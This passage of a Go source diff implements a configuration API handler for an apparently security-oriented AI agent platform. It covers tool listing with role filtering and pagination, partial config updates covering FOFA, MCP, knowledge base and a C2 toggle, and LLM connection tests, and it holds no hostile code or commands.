+ Vision config.VisionConfig `json:"vision"` + FOFA config.FofaConfig `json:"fofa"` + MCP config.MCPConfig `json:"mcp"` + Tools []ToolConfigInfo `json:"tools"` + Agent config.AgentConfig `json:"agent"` + Hitl config.HitlConfig `json:"hitl,omitempty"` + Knowledge config.KnowledgeConfig `json:"knowledge"` + Robots config.RobotsConfig `json:"robots,omitempty"` + MultiAgent config.MultiAgentPublic `json:"multi_agent,omitempty"` + C2 config.C2Public `json:"c2"` +} + +// ToolConfigInfo 工具配置信息 +type ToolConfigInfo struct { + Name string `json:"name"` + Description string `json:"description"` + Enabled bool `json:"enabled"` + IsExternal bool `json:"is_external,omitempty"` // 是否为外部MCP工具 + ExternalMCP string `json:"external_mcp,omitempty"` // 外部MCP名称(如果是外部工具) + RoleEnabled *bool `json:"role_enabled,omitempty"` // 该工具在当前角色中是否启用(nil表示未指定角色或使用所有工具) + InputSchema map[string]interface{} `json:"input_schema,omitempty"` // 工具参数 JSON Schema(用于前端展示详情) +} + +// GetConfig 获取当前配置 +func (h *ConfigHandler) GetConfig(c *gin.Context) { + h.mu.RLock() + defer h.mu.RUnlock() + + // 获取工具列表(包含内部和外部工具) + // 首先从配置文件获取工具 + configToolMap := make(map[string]bool) + tools := make([]ToolConfigInfo, 0, len(h.config.Security.Tools)) + + for _, tool := range h.config.Security.Tools { + configToolMap[tool.Name] = true + info := ToolConfigInfo{ + Name: tool.Name, + Description: h.pickToolDescription(tool.ShortDescription, tool.Description), + Enabled: tool.Enabled, + IsExternal: false, + } + tools = append(tools, info) + } + + // 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具) + if h.mcpServer != nil { + mcpTools := h.mcpServer.GetAllTools() + for _, mcpTool := range mcpTools { + if configToolMap[mcpTool.Name] { + continue + } + description := h.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description) + tools = append(tools, ToolConfigInfo{ + Name: mcpTool.Name, + Description: description, + Enabled: true, + IsExternal: false, + }) + } + } + + // 获取外部MCP工具(走缓存,持锁期间通常不阻塞) + if h.externalMCPMgr != nil { + ctx := context.Background() + externalTools := h.getExternalMCPTools(ctx) + for _, toolInfo := range externalTools { + tools = append(tools, toolInfo) + } + } + + subAgentCount := len(h.config.MultiAgent.SubAgents) + agentsDir := strings.TrimSpace(h.config.AgentsDir) + if agentsDir == "" { + agentsDir = "agents" + } + if !filepath.IsAbs(agentsDir) { + agentsDir = filepath.Join(filepath.Dir(h.configPath), agentsDir) + } + if load, err := agents.LoadMarkdownAgentsDir(agentsDir); err == nil { + subAgentCount = len(agents.MergeYAMLAndMarkdown(h.config.MultiAgent.SubAgents, load.SubAgents)) + } + multiPub := config.MultiAgentPublic{ + Enabled: h.config.MultiAgent.Enabled, + RobotDefaultAgentMode: config.NormalizeRobotAgentMode(h.config.MultiAgent), + BatchUseMultiAgent: h.config.MultiAgent.BatchUseMultiAgent, + SubAgentCount: subAgentCount, + Orchestration: config.NormalizeMultiAgentOrchestration(h.config.MultiAgent.Orchestration), + PlanExecuteLoopMaxIterations: h.config.MultiAgent.PlanExecuteLoopMaxIterations, + ToolSearchAlwaysVisibleTools: append([]string(nil), h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools...), + ToolSearchAlwaysVisibleEffectiveTools: mergeToolNameLists( + h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools, + builtin.GetAllBuiltinTools(), + ), + } + + c.JSON(http.StatusOK, GetConfigResponse{ + OpenAI: h.config.OpenAI, + Vision: h.config.Vision, + FOFA: h.config.FOFA, + MCP: h.config.MCP, + Tools: tools, + Agent: h.config.Agent, + Hitl: h.config.Hitl, + Knowledge: h.config.Knowledge, + C2: h.config.C2.Public(), + Robots: h.config.Robots, + MultiAgent: multiPub, + }) +} + +// GetToolsResponse 获取工具列表响应(分页) +type GetToolsResponse struct { + Tools []ToolConfigInfo `json:"tools"` + Total int `json:"total"` + TotalEnabled int `json:"total_enabled"` // 已启用的工具总数 + Page int `json:"page"` + PageSize int `json:"page_size"` + TotalPages int `json:"total_pages"` +} + +// GetTools 获取工具列表(支持分页和搜索) +func (h *ConfigHandler) GetTools(c *gin.Context) { + c.Header("Cache-Control", "no-store, no-cache, must-revalidate") + + // 解析分页参数 + page := 1 + pageSize := 20 + if pageStr := c.Query("page"); pageStr != "" { + if p, err := strconv.Atoi(pageStr); err == nil && p > 0 { + page = p + } + } + if pageSizeStr := c.Query("page_size"); pageSizeStr != "" { + if ps, err := strconv.Atoi(pageSizeStr); err == nil && ps > 0 && ps <= 100 { + pageSize = ps + } + } + + // 解析搜索参数 + searchTerm := c.Query("search") + searchTermLower := "" + if searchTerm != "" { + searchTermLower = strings.ToLower(searchTerm) + } + + // 解析状态筛选: tool_filter=on|off(角色弹窗等优先,避免与网关/代理对 enabled 的特殊处理冲突) + // 兼容旧参数 enabled=true|false + var filterEnabled *bool + toolFilter := strings.TrimSpace(strings.ToLower(c.Query("tool_filter"))) + switch toolFilter { + case "on", "1", "true", "enabled": + v := true + filterEnabled = &v + case "off", "0", "false", "disabled": + v := false + filterEnabled = &v + default: + enabledFilter := strings.TrimSpace(c.Query("enabled")) + if enabledFilter == "true" { + v := true + filterEnabled = &v + } else if enabledFilter == "false" { + v := false + filterEnabled = &v + } + } + + includeExternal := true + if v := strings.TrimSpace(strings.ToLower(c.Query("include_external"))); v == "0" || v == "false" || v == "no" { + includeExternal = false + } + refreshExternal := false + if v := strings.TrimSpace(strings.ToLower(c.Query("refresh_external"))); v == "1" || v == "true" || v == "yes" { + refreshExternal = true + } + + // 按外部 MCP 名称筛选(MCP 管理页左侧卡片 → 右侧工具列表联动) + externalMCPFilter := strings.TrimSpace(c.Query("external_mcp")) + + // 快照配置后立即释放锁,避免外部 MCP 网络 IO 阻塞整个配置子系统 + h.mu.RLock() + securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...) + roles := h.config.Roles + toolDescriptionMode := h.config.Security.ToolDescriptionMode + mcpServer := h.mcpServer + externalMCPMgr := h.externalMCPMgr + h.mu.RUnlock() + + pickDesc := func(shortDesc, fullDesc string) string { + return pickToolDescriptionWithMode(toolDescriptionMode, shortDesc, fullDesc) + } + + // 解析角色参数,用于过滤工具并标注启用状态 + roleName := c.Query("role") + var roleToolsSet map[string]bool // 角色配置的工具集合 + var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色) + if roleName != "" && roleName != "默认" && roles != nil { + if role, exists := roles[roleName]; exists && role.Enabled { + if len(role.Tools) > 0 { + // 角色配置了工具列表,只使用这些工具 + roleToolsSet = make(map[string]bool) + for _, toolKey := range role.Tools { + roleToolsSet[toolKey] = true + } + roleUsesAllTools = false + } + } + } + + // 获取所有内部工具并应用搜索过滤 + configToolMap := make(map[string]bool) + allTools := make([]ToolConfigInfo, 0, len(securityTools)) + for _, tool := range securityTools { + configToolMap[tool.Name] = true + toolInfo := ToolConfigInfo{ + Name: tool.Name, + Description: pickDesc(tool.ShortDescription, tool.Description), + Enabled: tool.Enabled, + IsExternal: false, + } + + // 根据角色配置标注工具状态 + if roleName != "" { + if roleUsesAllTools { + // 角色使用所有工具,标注启用的工具为role_enabled=true + if tool.Enabled { + roleEnabled := true + toolInfo.RoleEnabled = &roleEnabled + } else { + roleEnabled := false + toolInfo.RoleEnabled = &roleEnabled + } + } else { + // 角色配置了工具列表,检查工具是否在列表中 + // 内部工具使用工具名称作为key + if roleToolsSet[tool.Name] { + roleEnabled := tool.Enabled // 工具必须在角色列表中且本身启用 + toolInfo.RoleEnabled = &roleEnabled + } else { + // 不在角色列表中,标记为false + roleEnabled := false + toolInfo.RoleEnabled = &roleEnabled + } + } + } + + // 如果有关键词,进行搜索过滤 + if searchTermLower != "" { + nameLower := strings.ToLower(toolInfo.Name) + descLower := strings.ToLower(toolInfo.Description) + if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) { + continue // 不匹配,跳过 + } + } + + // 状态筛选 + if filterEnabled != nil && toolInfo.Enabled != *filterEnabled { + continue + } + + allTools = append(allTools, toolInfo) + } + + // 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具) + if mcpServer != nil { + mcpTools := mcpServer.GetAllTools() + for _, mcpTool := range mcpTools { + // 跳过已经在配置文件中的工具(避免重复) + if configToolMap[mcpTool.Name] { + continue + } + + description := pickDesc(mcpTool.ShortDescription, mcpTool.Description) + + toolInfo := ToolConfigInfo{ + Name: mcpTool.Name, + Description: description, + Enabled: true, + IsExternal: false, + } + + // 根据角色配置标注工具状态 + if roleName != "" { + if roleUsesAllTools { + // 角色使用所有工具,直接注册的工具默认启用 + roleEnabled := true + toolInfo.RoleEnabled = &roleEnabled + } else { + // 角色配置了工具列表,检查工具是否在列表中 + // 内部工具使用工具名称作为key + if roleToolsSet[mcpTool.Name] { + roleEnabled := true // 在角色列表中且工具本身启用 + toolInfo.RoleEnabled = &roleEnabled + } else { + // 不在角色列表中,标记为false + roleEnabled := false + toolInfo.RoleEnabled = &roleEnabled + } + } + } + + // 如果有关键词,进行搜索过滤 + if searchTermLower != "" { + nameLower := strings.ToLower(toolInfo.Name) + descLower := strings.ToLower(toolInfo.Description) + if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) { + continue // 不匹配,跳过 + } + } + + // 状态筛选 + if filterEnabled != nil && toolInfo.Enabled != *filterEnabled { + continue + } + + allTools = append(allTools, toolInfo) + } + } + + // 获取外部MCP工具(可走缓存,不持有 config 锁) + if includeExternal && externalMCPMgr != nil { + if refreshExternal { + externalMCPMgr.InvalidateAllToolCaches() + } + ctx := context.Background() + externalTools := h.getExternalMCPToolsWithManager(ctx, externalMCPMgr, pickDesc) + + // 应用搜索过滤和角色配置 + for _, toolInfo := range externalTools { + // 搜索过滤 + if searchTermLower != "" { + nameLower := strings.ToLower(toolInfo.Name) + descLower := strings.ToLower(toolInfo.Description) + if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) { + continue // 不匹配,跳过 + } + } + + // 根据角色配置标注工具状态 + if roleName != "" { + if roleUsesAllTools { + // 角色使用所有工具,标注启用的工具为role_enabled=true + roleEnabled := toolInfo.Enabled + toolInfo.RoleEnabled = &roleEnabled + } else { + // 角色配置了工具列表,检查工具是否在列表中 + // 外部工具使用 "mcpName::toolName" 格式作为key + externalToolKey := fmt.Sprintf("%s::%s", toolInfo.ExternalMCP, toolInfo.Name) + if roleToolsSet[externalToolKey] { + roleEnabled := toolInfo.Enabled // 工具必须在角色列表中且本身启用 + toolInfo.RoleEnabled = &roleEnabled + } else { + // 不在角色列表中,标记为false + roleEnabled := false + toolInfo.RoleEnabled = &roleEnabled + } + } + } + + // 状态筛选 + if filterEnabled != nil && toolInfo.Enabled != *filterEnabled { + continue + } + + allTools = append(allTools, toolInfo) + } + } + + // 如果角色配置了工具列表,过滤工具(只保留列表中的工具,但保留其他工具并标记为禁用) + // 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态 + // 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用 + + if externalMCPFilter != "" { + filtered := make([]ToolConfigInfo, 0) + for _, tool := range allTools { + if tool.IsExternal && tool.ExternalMCP == externalMCPFilter { + filtered = append(filtered, tool) + } + } + allTools = filtered + } + + // 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致 + sort.SliceStable(allTools, func(i, j int) bool { + key := func(t ToolConfigInfo) string { + if t.IsExternal && t.ExternalMCP != "" { + return strings.ToLower(t.ExternalMCP + "::" + t.Name) + } + return strings.ToLower(t.Name) + } + return key(allTools[i]) < key(allTools[j]) + }) + + total := len(allTools) + // 统计已启用的工具数(在角色中的启用工具数) + totalEnabled := 0 + for _, tool := range allTools { + if tool.RoleEnabled != nil && *tool.RoleEnabled { + totalEnabled++ + } else if tool.RoleEnabled == nil && tool.Enabled { + // 如果未指定角色,统计所有启用的工具 + totalEnabled++ + } + } + + totalPages := (total + pageSize - 1) / pageSize + if totalPages == 0 { + totalPages = 1 + } + + // 计算分页范围 + offset := (page - 1) * pageSize + end := offset + pageSize + if end > total { + end = total + } + + var tools []ToolConfigInfo + if offset < total { + tools = allTools[offset:end] + } else { + tools = []ToolConfigInfo{} + } + + c.JSON(http.StatusOK, GetToolsResponse{ + Tools: tools, + Total: total, + TotalEnabled: totalEnabled, + Page: page, + PageSize: pageSize, + TotalPages: totalPages, + }) +} + +// UpdateConfigRequest 更新配置请求 +type UpdateConfigRequest struct { + OpenAI *config.OpenAIConfig `json:"openai,omitempty"` + Vision *config.VisionConfig `json:"vision,omitempty"` + FOFA *config.FofaConfig `json:"fofa,omitempty"` + MCP *config.MCPConfig `json:"mcp,omitempty"` + Tools []ToolEnableStatus `json:"tools,omitempty"` + Agent *AgentConfigUpdate `json:"agent,omitempty"` + Knowledge *config.KnowledgeConfig `json:"knowledge,omitempty"` + Robots *config.RobotsConfig `json:"robots,omitempty"` + MultiAgent *config.MultiAgentAPIUpdate `json:"multi_agent,omitempty"` + C2 *config.C2APIUpdate `json:"c2,omitempty"` +} + +// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。 +// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。 +type AgentConfigUpdate struct { + MaxIterations *int `json:"max_iterations,omitempty"` + ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"` + SystemPromptPath *string `json:"system_prompt_path,omitempty"` +} + +func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) { + if dst == nil || src == nil { + return + } + if src.MaxIterations != nil { + dst.MaxIterations = *src.MaxIterations + } + if src.ToolTimeoutMinutes != nil { + dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes + } + if src.SystemPromptPath != nil { + dst.SystemPromptPath = *src.SystemPromptPath + } +} + +// ToolEnableStatus 工具启用状态 +type ToolEnableStatus struct { + Name string `json:"name"` + Enabled bool `json:"enabled"` + IsExternal bool `json:"is_external,omitempty"` // 是否为外部MCP工具 + ExternalMCP string `json:"external_mcp,omitempty"` // 外部MCP名称(如果是外部工具) +} + +// UpdateConfig 更新配置 +func (h *ConfigHandler) UpdateConfig(c *gin.Context) { + var req UpdateConfigRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + h.mu.Lock() + defer h.mu.Unlock() + + // 更新OpenAI配置 + if req.OpenAI != nil { + h.config.OpenAI = *req.OpenAI + h.logger.Info("更新OpenAI配置", + zap.String("base_url", h.config.OpenAI.BaseURL), + zap.String("model", h.config.OpenAI.Model), + ) + } + + if req.Vision != nil { + h.config.Vision = *req.Vision + h.logger.Info("更新 Vision 配置", + zap.Bool("enabled", h.config.Vision.Enabled), + zap.String("model", h.config.Vision.Model), + ) + } + + // 更新FOFA配置 + if req.FOFA != nil { + h.config.FOFA = *req.FOFA + h.logger.Info("更新FOFA配置", zap.String("email", h.config.FOFA.Email)) + } + + // 更新MCP配置 + if req.MCP != nil { + h.config.MCP = *req.MCP + h.logger.Info("更新MCP配置", + zap.Bool("enabled", h.config.MCP.Enabled), + zap.String("host", h.config.MCP.Host), + zap.Int("port", h.config.MCP.Port), + ) + } + + // 更新Agent配置(按字段合并,避免部分 JSON 把未出现的字段写成 0) + if req.Agent != nil { + applyAgentConfigUpdate(&h.config.Agent, req.Agent) + h.logger.Info("更新Agent配置", + zap.Int("max_iterations", h.config.Agent.MaxIterations), + zap.Int("tool_timeout_minutes", h.config.Agent.ToolTimeoutMinutes), + ) + if h.agent != nil && req.Agent.MaxIterations != nil { + h.agent.UpdateMaxIterations(h.config.Agent.MaxIterations) + } + if h.mcpServer != nil { + h.mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(h.config.Agent.ToolTimeoutMinutes) + } + } + + // 更新Knowledge配置 + if req.Knowledge != nil { + // 保存旧的嵌入模型配置(用于检测变更) + if h.config.Knowledge.Enabled { + h.lastEmbeddingConfig = &config.EmbeddingConfig{ + Provider: h.config.Knowledge.Embedding.Provider, + Model: h.config.Knowledge.Embedding.Model, + BaseURL: h.config.Knowledge.Embedding.BaseURL, + APIKey: h.config.Knowledge.Embedding.APIKey, + } + } + h.config.Knowledge = *req.Knowledge + h.logger.Info("更新Knowledge配置", + zap.Bool("enabled", h.config.Knowledge.Enabled), + zap.String("base_path", h.config.Knowledge.BasePath), + zap.String("embedding_model", h.config.Knowledge.Embedding.Model), + zap.Int("retrieval_top_k", h.config.Knowledge.Retrieval.TopK), + zap.Float64("similarity_threshold", h.config.Knowledge.Retrieval.SimilarityThreshold), + ) + } + + // 更新机器人配置 + if req.Robots != nil { + h.config.Robots = *req.Robots + h.logger.Info("更新机器人配置", + zap.Bool("wechat_enabled", h.config.Robots.Wechat.Enabled), + zap.Bool("wecom_enabled", h.config.Robots.Wecom.Enabled), + zap.Bool("dingtalk_enabled", h.config.Robots.Dingtalk.Enabled), + zap.Bool("lark_enabled", h.config.Robots.Lark.Enabled), + ) + } + + if req.C2 != nil { + v := req.C2.Enabled + h.config.C2.Enabled = &v + h.logger.Info("更新C2配置", zap.Bool("enabled", v)) + } + + // 多代理标量(sub_agents 等仍由 config.yaml 维护) + if req.MultiAgent != nil { + h.config.MultiAgent.Enabled = req.MultiAgent.Enabled + h.config.MultiAgent.BatchUseMultiAgent = req.MultiAgent.BatchUseMultiAgent + if mode := strings.TrimSpace(req.MultiAgent.RobotDefaultAgentMode); mode != "" { + h.config.MultiAgent.RobotDefaultAgentMode = mode + } else { + h.config.MultiAgent.RobotDefaultAgentMode = "eino_single" + } + if req.MultiAgent.PlanExecuteLoopMaxIterations != nil { + h.config.MultiAgent.PlanExecuteLoopMaxIterations = *req.MultiAgent.PlanExecuteLoopMaxIterations + } + if req.MultiAgent.ToolSearchAlwaysVisibleTools != nil { + h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools = dedupeToolNameList(*req.MultiAgent.ToolSearchAlwaysVisibleTools) + } + h.logger.Info("更新多代理配置", + zap.Bool("enabled", h.config.MultiAgent.Enabled), + zap.String("robot_default_agent_mode", config.NormalizeRobotAgentMode(h.config.MultiAgent)), + zap.Bool("batch_use_multi_agent", h.config.MultiAgent.BatchUseMultiAgent), + zap.Int("plan_execute_loop_max_iterations", h.config.MultiAgent.PlanExecuteLoopMaxIterations), + zap.Int("tool_search_always_visible_tools", len(h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools)), + ) + } + + // 更新工具启用状态 + if req.Tools != nil { + // 分离内部工具和外部工具 + internalToolMap := make(map[string]bool) + // 外部工具状态:MCP名称 -> 工具名称 -> 启用状态 + externalMCPToolMap := make(map[string]map[string]bool) + + for _, toolStatus := range req.Tools { + if toolStatus.IsExternal && toolStatus.ExternalMCP != "" { + // 外部工具:保存每个工具的独立状态 + mcpName := toolStatus.ExternalMCP + if externalMCPToolMap[mcpName] == nil { + externalMCPToolMap[mcpName] = make(map[string]bool) + } + externalMCPToolMap[mcpName][toolStatus.Name] = toolStatus.Enabled + } else { + // 内部工具 + internalToolMap[toolStatus.Name] = toolStatus.Enabled + } + } + + // 更新内部工具状态 + for i := range h.config.Security.Tools { + if enabled, ok := internalToolMap[h.config.Security.Tools[i].Name]; ok { + h.config.Security.Tools[i].Enabled = enabled + h.logger.Info("更新工具启用状态", + zap.String("tool", h.config.Security.Tools[i].Name), + zap.Bool("enabled", enabled), + ) + } + } + + // 更新外部MCP工具状态 + if h.externalMCPMgr != nil { + for mcpName, toolStates := range externalMCPToolMap { + // 更新配置中的工具启用状态 + if h.config.ExternalMCP.Servers == nil { + h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig) + } + cfg, exists := h.config.ExternalMCP.Servers[mcpName] + if !exists { + h.logger.Warn("外部MCP配置不存在", zap.String("mcp", mcpName)) + continue + } + + // 初始化ToolEnabled map + if cfg.ToolEnabled == nil { + cfg.ToolEnabled = make(map[string]bool) + } + + // 更新每个工具的启用状态 + for toolName, enabled := range toolStates { + cfg.ToolEnabled[toolName] = enabled + h.logger.Info("更新外部工具启用状态", + zap.String("mcp", mcpName), + zap.String("tool", toolName), + zap.Bool("enabled", enabled), + ) + } + + // 检查是否有任何工具启用,如果有则启用MCP + hasEnabledTool := false + for _, enabled := range cfg.ToolEnabled { + if enabled { + hasEnabledTool = true + break + } + } + + // 如果MCP之前未启用,但现在有工具启用,则启用MCP + // 如果MCP之前已启用,保持启用状态(允许部分工具禁用) + if !cfg.ExternalMCPEnable && hasEnabledTool { + cfg.ExternalMCPEnable = true + h.logger.Info("自动启用外部MCP(因为有工具启用)", zap.String("mcp", mcpName)) + } + + h.config.ExternalMCP.Servers[mcpName] = cfg + } + + // 同步更新 externalMCPMgr 中的配置,确保 GetConfigs() 返回最新配置 + // 在循环外部统一更新,避免重复调用 + h.externalMCPMgr.LoadConfigs(&h.config.ExternalMCP) + + // 处理MCP连接状态(异步启动,避免阻塞) + for mcpName := range externalMCPToolMap { + cfg := h.config.ExternalMCP.Servers[mcpName] + // 如果MCP需要启用,确保客户端已启动 + if cfg.ExternalMCPEnable { + // 启动外部MCP(如果未启动)- 异步执行,避免阻塞 + client, exists := h.externalMCPMgr.GetClient(mcpName) + if !exists || !client.IsConnected() { + go func(name string) { + if err := h.externalMCPMgr.StartClient(name); err != nil { + h.logger.Warn("启动外部MCP失败", + zap.String("mcp", name), + zap.Error(err), + ) + } else { + h.logger.Info("启动外部MCP", + zap.String("mcp", name), + ) + } + }(mcpName) + } + } + } + } + } + + // 保存配置到文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + if h.audit != nil { + h.audit.RecordOK(c, "config", "update", "更新内存配置", "config", "", nil) + } + c.JSON(http.StatusOK, gin.H{"message": "配置已更新"}) +} + +// TestOpenAIRequest 测试OpenAI连接请求 +type TestOpenAIRequest struct { + Provider string `json:"provider"` + BaseURL string `json:"base_url"` + APIKey string `json:"api_key"` + Model string `json:"model"` +} + +// TestOpenAI 测试OpenAI API连接是否可用 +func (h *ConfigHandler) TestOpenAI(c *gin.Context) { + var req TestOpenAIRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + if strings.TrimSpace(req.APIKey) == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "API Key 不能为空"}) + return + } + if strings.TrimSpace(req.Model) == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "模型不能为空"}) + return + } + + baseURL := strings.TrimSuffix(strings.TrimSpace(req.BaseURL), "/") + if baseURL == "" { + if strings.EqualFold(strings.TrimSpace(req.Provider), "claude") { + baseURL = "https://api.anthropic.com" + } else { + baseURL = "https://api.openai.com/v1" + } + } + + // 构造一个最小的 chat completion 请求 + payload := map[string]interface{}{ + "model": req.Model, + "messages": []map[string]string{ + {"role": "user", "content": "Hi"}, + }, + "max_completion_tokens": 5, + } + + // 使用内部 openai Client 进行测试,若 provider 为 claude 会自动走桥接层 + tmpCfg := &config.OpenAIConfig{ + Provider: req.Provider, + BaseURL: baseURL, + APIKey: strings.TrimSpace(req.APIKey), + Model: req.Model, + } + client := openai.NewClient(tmpCfg, nil, h.logger) + + ctx, cancel := context.WithTimeout(c.Request.Context(), 30*time.Second) + defer cancel() + + start := time.Now() + var chatResp struct { + ID string `json:"id"` + Object string `json:"object"` + Model string `json:"model"` + Choices []struct { + Message struct { + Role string `json:"role"` + Content string `json:"content"` + } `json:"message"` + } `json:"choices"` + } + err := client.ChatCompletion(ctx, payload, &chatResp) + latency := time.Since(start) + + if err != nil { + if apiErr, ok := err.(*openai.APIError); ok { + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": fmt.Sprintf("API 返回错误 (HTTP %d): %s", apiErr.StatusCode, apiErr.Body), + "status_code": apiErr.StatusCode, + }) + return + } + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": "连接失败: " + err.Error(), + }) + return + } + + // 严格校验:必须包含 choices 且有 assistant 回复 + if len(chatResp.Choices) == 0 { + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": "API 响应缺少 choices 字段,请检查 Base URL 路径是否正确", + }) + return + } + if chatResp.ID == "" && chatResp.Model == "" { + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": "API 响应格式不符合预期,请检查 Base URL 是否正确", + }) + return + } + + c.JSON(http.StatusOK, gin.H{ + "success": true, + "model": chatResp.Model, + "latency_ms": latency.Milliseconds(), + }) +} + +// TestVisionRequest 测试 Vision 模型连接;vision.api_key/base_url 留空时可传 openai 段作回退。 +type TestVisionRequest struct { + Vision config.VisionConfig `json:"vision"` + OpenAI config.OpenAIConfig `json:"openai,omitempty"` +} + +// TestVision 测试视觉模型 API 连接(最小 chat completion)。 +func (h *ConfigHandler) TestVision(c *gin.Context) { + var req TestVisionRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + oa := req.Vision.OpenAICfgEffective(req.OpenAI) + if strings.TrimSpace(oa.APIKey) == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "API Key 不能为空(可填写 vision.api_key 或 openai.api_key)"}) + return + } + if strings.TrimSpace(oa.Model) == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "视觉模型不能为空"}) + return + } + + baseURL := strings.TrimSuffix(strings.TrimSpace(oa.BaseURL), "/") + if baseURL == "" { + if strings.EqualFold(strings.TrimSpace(oa.Provider), "claude") { + baseURL = "https://api.anthropic.com" + } else { + baseURL = "https://api.openai.com/v1" + } + } + + payload := map[string]interface{}{ + "model": oa.Model, + "messages": []map[string]string{ + {"role": "user", "content": "Hi"}, + }, + "max_completion_tokens": 5, + } + + tmpCfg := &config.OpenAIConfig{ + Provider: oa.Provider, + BaseURL: baseURL, + APIKey: strings.TrimSpace(oa.APIKey), + Model: oa.Model, + } + client := openai.NewClient(tmpCfg, nil, h.logger) + + ctx, cancel := context.WithTimeout(c.Request.Context(), 30*time.Second) + defer cancel() + + start := time.Now() + var chatResp struct { + Model string `json:"model"` + Choices []struct { + Message struct { + Content string `json:"content"` + } `json:"message"` + } `json:"choices"` + } + err := client.ChatCompletion(ctx, payload, &chatResp) + latency := time.Since(start) + + if err != nil { + if apiErr, ok := err.(*openai.APIError); ok { + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": fmt.Sprintf("API 返回错误 (HTTP %d): %s", apiErr.StatusCode, apiErr.Body), + "status_code": apiErr.StatusCode, + }) + return + } + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": "连接失败: " + err.Error(), + }) + return + } + if len(chatResp.Choices) == 0 { + c.JSON(http.StatusOK, gin.H{ + "success": false, + "error": "API 响应缺少 choices 字段,请检查 Base URL 与视觉模型名称", + }) + return + } + + c.JSON(http.StatusOK, gin.H{ + "success": true, + "model": chatResp.Model, + "latency_ms": latency.Milliseconds(), + }) +} + +// ApplyConfig 应用配置(重新加载并重启相关服务) +func (h *ConfigHandler) ApplyConfig(c *gin.Context) { + // 先检查是否需要动态初始化知识库(在锁外执行,避免阻塞其他请求) + var needInitKnowledge bool + var knowledgeInitializer KnowledgeInitializer + + h.mu.RLock() + needInitKnowledge = h.config.Knowledge.Enabled && h.knowledgeToolRegistrar == nil && h.knowledgeInitializer != nil + if needInitKnowledge { + knowledgeInitializer = h.knowledgeInitializer + } + h.mu.RUnlock() + + // 如果需要动态初始化知识库,在锁外执行(这是耗时操作) + if needInitKnowledge { + h.logger.Info("检测到知识库从禁用变为启用,开始动态初始化知识库组件") + if _, err := knowledgeInitializer(); err != nil { + h.logger.Error("动态初始化知识库失败", zap.Error(err)) + if h.audit != nil { + h.audit.RecordFail(c, "config", "apply", "应用配置失败:初始化知识库", map[string]interface{}{"error": err.Error()}) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": "初始化知识库失败: " + err.Error()}) + return + } + h.logger.Info("知识库动态初始化完成,工具已注册") + } + + // 检查嵌入模型配置是否变更(需要在锁外执行,避免阻塞) + var needReinitKnowledge bool + var reinitKnowledgeInitializer KnowledgeInitializer + h.mu.RLock() + if h.config.Knowledge.Enabled && h.knowledgeInitializer != nil && h.lastEmbeddingConfig != nil { + // 检查嵌入模型配置是否变更 + currentEmbedding := h.config.Knowledge.Embedding + if currentEmbedding.Provider != h.lastEmbeddingConfig.Provider || + currentEmbedding.Model != h.lastEmbeddingConfig.Model || + currentEmbedding.BaseURL != h.lastEmbeddingConfig.BaseURL || + currentEmbedding.APIKey != h.lastEmbeddingConfig.APIKey { + needReinitKnowledge = true + reinitKnowledgeInitializer = h.knowledgeInitializer + h.logger.Info("检测到嵌入模型配置变更,需要重新初始化知识库组件", + zap.String("old_model", h.lastEmbeddingConfig.Model), + zap.String("new_model", currentEmbedding.Model), + zap.String("old_base_url", h.lastEmbeddingConfig.BaseURL), + zap.String("new_base_url", currentEmbedding.BaseURL), + ) + } + } + h.mu.RUnlock() + + // 如果需要重新初始化知识库(嵌入模型配置变更),在锁外执行 + if needReinitKnowledge { + h.logger.Info("开始重新初始化知识库组件(嵌入模型配置已变更)") + if _, err := reinitKnowledgeInitializer(); err != nil { + h.logger.Error("重新初始化知识库失败", zap.Error(err)) + if h.audit != nil { + h.audit.RecordFail(c, "config", "apply", "应用配置失败:重新初始化知识库", map[string]interface{}{"error": err.Error()}) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": "重新初始化知识库失败: " + 